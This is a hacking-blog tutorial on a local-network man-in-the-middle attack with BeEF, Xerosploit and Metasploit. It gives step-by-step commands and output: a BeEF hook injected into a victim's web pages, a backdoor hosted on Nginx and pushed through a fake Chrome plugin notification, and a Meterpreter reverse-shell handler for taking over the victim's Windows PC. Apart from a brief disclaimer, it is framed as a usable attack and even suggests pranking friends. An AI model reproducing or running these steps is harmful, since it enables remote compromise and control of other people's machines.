Sploitech

How To Do Advanced MITM Attacks With BeEF & Xerosploit

BEeF & Xerosploit

Tools & Software Required:

  • One System Capable Of Running Kali Linux. (You can also use virtual machines to perform the hack)
  • One host machine of your own to be hacked.
  • Xerosploit
  • BeEF

Installing BeEF & Xerosploit

First we will be installing BeEF. To install BeEF

  • Type: sudo apt install beef-xss
				
					sudo apt install beef-xss
				
			

Now to install xerosploit check out our article on:  

Setting Up BeEF Script

Now to start BeEF

  • Type: sudo beef-xss
				
					sudo beef-xss
				
			

After the beef start’s a browser window should pop up. Now don’t worry if you are getting an error screen. You have to replace the IP address 127.0.0.1 with your IP address. To get your IP address

  • Type: hostname -I
				
					hostname -I
				
			

Now to get to the beef login page open your browser and Type: YourIp:3000/ui/panel

The default login username will be the beef.

Creating Our Hook Script

Now we have to create your hook script which will be injected when the user will visit any unsecured website. To create a new hook script

  • Type: sudo nano /home/kali/hook.html

A new file is going to be created by the name of the hook.html you have to type these lines in the file:

				
					<html>
    <head>
        <script src="http://127.0.0.1:3000/hook.js" type="text/javascript" defer></script>
    </head>
</html>
				
			

Now press Ctrl+X and type Y to save and press Enter to exit.

Injecting Our Hook Script

Now for the last step, we have to inject the Html file we just created. To do this we will be using a tool called xerosploit. If you don’t know about xerosploit check out our article on: 

To start xerosploit Type: sudo xerosploit

				
					kali@kali:~$ sudo xerosploit


        ▄  ▄███▄   █▄▄▄▄ ████▄    ▄▄▄▄▄   █ ▄▄  █     ████▄ ▄█    ▄▄▄▄▀
    ▀▄   █ █▀   ▀  █  ▄▀ █   █   █     ▀▄ █   █ █     █   █ ██ ▀▀▀ █
      █ ▀  ██▄▄    █▀▀▌  █   █ ▄  ▀▀▀▀▄   █▀▀▀  █     █   █ ██     █
     ▄ █   █▄   ▄▀ █  █  ▀████  ▀▄▄▄▄▀    █     ███▄  ▀████ ▐█    █
    █   ▀▄ ▀███▀     █                     █        ▀        ▐   ▀
     ▀              ▀                       ▀


[+]═══════════[ Author : @LionSec1 _-\|/-_ Website: www.neodrix.com ]═══════════[+]

                      [ Powered by Bettercap and Nmap ]

┌═════════════════════════════════════════════════════════════════════════════┐
█                                                                             █
█                         Your Network Configuration                          █
█                                                                             █
└═════════════════════════════════════════════════════════════════════════════┘

╒══════════════╤═══════════════════╤═════════════╤═════════╤════════════╕
│  IP Address  │    MAC Address    │   Gateway   │  Iface  │  Hostname  │
╞══════════════╪═══════════════════╪═════════════╪═════════╪════════════╡
├──────────────┼───────────────────┼─────────────┼─────────┼────────────┤
│ 192.168.1.5  │ B8:27:EB:29:5B:BF │ 192.168.1.1 │  wlan0  │    kali    │
╘══════════════╧═══════════════════╧═════════════╧═════════╧════════════╛

╔═════════════╦════════════════════════════════════════════════════════════════════╗
║             ║ XeroSploit is a penetration testing toolkit whose goal is to       ║
║ Information ║ perform man in the middle attacks for testing purposes.            ║
║             ║ It brings various modules that allow to realise efficient attacks. ║
║             ║ This tool is Powered by Bettercap and Nmap.                        ║
╚═════════════╩════════════════════════════════════════════════════════════════════╝

[+] Please type 'help' to view commands.

Xero ➮
				
			

Now we have to get the target IP address. To start mapping the network on which you and target is are connected Type: scan

These all the devices shown below are mine. Do Not Do This To Hack Anyone.

				
					Xero ➮ scan

[++] Mapping your network ...

[+]═══════════[ Devices found on your network ]═══════════[+]

╔═════════════╦═══════════════════╦════════════════════════════╗
║ IP Address  ║ Mac Address       ║ Manufacturer               ║
╠═════════════╬═══════════════════╬════════════════════════════╣
║ 192.168.1.1 ║ 24:0B:88:AE:18:20 ║ (Unknown)                  ║
║ 192.168.1.2 ║ E0:13:B5:73:59:E3 ║ (vivo MobileCommunication) ║
║ 192.168.1.3 ║ E0:CC:F8:40:8B:E6 ║ (Xiaomi Communications)    ║
║ 192.168.1.6 ║ 98:48:27:D8:21:48 ║ (Tp-link Technologies)     ║
║ 192.168.1.7 ║ EA:A4:2A:21:CF:86 ║ (Unknown)                  ║
║ 192.168.1.5 ║ E4:5F:01:0A:D6:9E ║ (This device)              ║
║             ║                   ║                            ║
╚═════════════╩═══════════════════╩════════════════════════════╝

[+] Please choose a target (e.g. 192.168.1.10). Enter 'help' for more information.

Xero ➮ 192.168.1.6
				
			

Now select the target IP address. I am targeting (Tp-link Technologies).

				
					Xero ➮ 192.168.1.6

[++] 192.168.1.6 has been targeted.

[+] Which module do you want to load ? Enter 'help' for more information.
Xero»modules ➮
				
			

After selecting the target, it will ask you which attack you want to perform on the target. We will be using HTML injection as we have to inject Html files on the target browser.

  • Type: injecthtml

After the module has been selected Type: run to start the attack. When the attack starts it will ask you to enter the location where your Html file is stored Type the path to the file.

				
					Xero»modules ➮ injecthtml

┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                         Inject Html                          █
█                                                              █
█           Inject Html code in all visited webpage            █
└══════════════════════════════════════════════════════════════┘

[+] Enter 'run' to execute the 'injecthtml' command.

Xero»modules»injecthtml ➮ run

[+] Specify the file containing html code you would like to inject.

Xero»modules»Injecthtml ➮ /home/kali/hook.html

[++] Injecting Html code ...

[++] Press 'Ctrl + C' to stop .
				
			

Whenever the target visits any unsecured website, then your HTML code is going to be injected. Note: If the target is using a VPN, then this attack might not work.

Setting Up Nginx & Backdoor

There are more than 300 commands in beef that we can run on the target browser, but some of them require additional software or plugins on the target browser to work. For now, we are going to do some basic attacks like getting a reverse shell from the target pc by sending a fake notification to the target. But first, we need to create a backdoor for that check out our article on: 

After your backdoor is created we have to start a local server on our IP from which the target will download the file. I will be using Nginx.

To install Nginx copy & paste the line given bellow

				
					sudo apt-get update
sudo apt install nginx 
				
			

After installing Nginx you have to copy and paste the backdoor file into the Html directory so that it can be downloaded. The command below will copy and paste the file to the Html directory.

				
					sudo cp /{path to file}/{file name} /var/www/html/
				
			

Now we have to do one extra step because our xerosploit is also running on port 80, so we cannot download files. It will redirect us to the youtube rickroll video. So as our port 80 is in use, we can use Nginx on another port. To do so we have to manually configure Nginx config files.
To do that let’s open our text editor and edit the file.

Type: sudo nano /etc/nginx/sites-enabled/default

				
					sudo nano /etc/nginx/sites-enabled/default
				
			

Look for the line that begins with listen inside server block. It will look something like:

				
					server {
        listen 80 default_server;
        listen [::]:80 default_server;
        ...
				
			

Change port number 80 to any other port number. In my case, I will be using port 3333.

				
					server {
        listen 3333 default_server;
        listen [::]:3333 default_server;
        ...
				
			

After you have changed the two-port numbers press:

  • ctrl + x enter y for yes and again press enter to exit.

Now before we can proceed, let’s restart the Nginx so that the changes take place.

To Restart Tor Type: sudo service nginx restart

				
					sudo service nginx restart
				
			

Now that your server and file are ready we can proceed to send a fake notification to the target.

Using BeEF Commands

Now when the target visits any unsecured site, he is going to be hooked. When we open our beef control panel, we will see the list of the online hooked browser. Under the current browser, we can see a lot of information about our target device.

BeEF Hook

Now under commands, all the attacks are listed that you can perform on the target. We will be using social engineering. Under social engineering, there are many attacks like Google phishing, fake notification bar, pretty theft, and more.

Now choose the correct fake notification bar for the target browser. In my case, the target is using chrome. So I will be using the fake notification bar (Chrome). 

Now we have to enter two things. The first is the URL from where the file is going to be downloaded and the second is the message which will be displayed to the target.

First, we have to get our device IP address to get the IP address

  • Type: hostname -I
				
					hostname -I
				
			

When we have our IP address ready just type this line in the URL field

  • Type: http://YourIP:3333/Payload Name/
				
					http://YourIP:3333/Payload Name/
				
			

I am going to use the default message in the fake notification bar. You can customize the message if you want to.

I am going to use the default message in the fake notification bar. You can customize the message if you want to. Now click on execute to send the notification to the target. On the target browser, he will see a notification to install a plugin, but it is our payload which he will be downloading.

Configuring Metasploit Framework

To set up Metasploit follow the given steps:

  • Type: msfconsole in a new terminal (Wait For Metasploit To Load)
  • Type: use exploit/multi/handler
				
					msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
				
			

We want to attack windows pc so we have to select the windows payload. Meterpreter is the name of the payload.

  • We are using Meterpreter because it is easy for beginners and it’s going to allow us to gain reverse shell access to the target pc.
  • Type: set payload windows/meterpreter/
    reverse_tcp
				
					msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
				
			

The listening host is the IP address of the attacker’s machine (Kali Linux)

  • Type: set lhost [Your Kali Linux IP]
				
					msf6 exploit(multi/handler) > set lhost 192.168.1.8
lhost => 192.168.1.8
				
			

The listening port is the port on which kali will receive the connection from the target pc. By default, it will be set to 4444 but we have to change it to 8080 because our exe file and many web servers use port 8080.

  • Type: set lport=8080
				
					msf6 exploit(multi/handler) > set lport 8080
lport => 8080
				
			

Now if you have followed the above steps correctly type options to get the list of the settings you have entered earlier and check if you have entered it correctly or not.

  • Type: options
				
					msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.8     yes       The listen address (an interface may be specified)
   LPORT     8080             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
				
			

Now we have to start the attack.

  • Type: exploit or run
				
					msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.8:8080 

				
			

Testing The Notification Payload

Now when the target will open the file he will see a very quick image of the windows power shell. Now the target pc has been hacked we will get a reverse shell from the target pc.

Conclusion

These types of attacks are good. But the attacks might not work if your target is using, VPN or has a firewall with high security. BeEF is also a great tool to prank your friends too. Try out its other modules and comment down what you think about beef and xerosploit.

Liked This Article? Join Our Newsletter.

It’s Free! Get exclusive access to new tips, articles, guides, updates, and more.

Share It On:

Share on facebook
Facebook
Share on whatsapp
WhatsApp
Share on reddit
Reddit
Share on telegram
Telegram
Share on email
Email

COMMENTS:

Leave a Reply

Your email address will not be published. Required fields are marked *

You Might Also Like:

Want To Know About Latest Hacking Tricks?

It’s Free! Get exclusive access to new tips, articles, guides, updates, and more.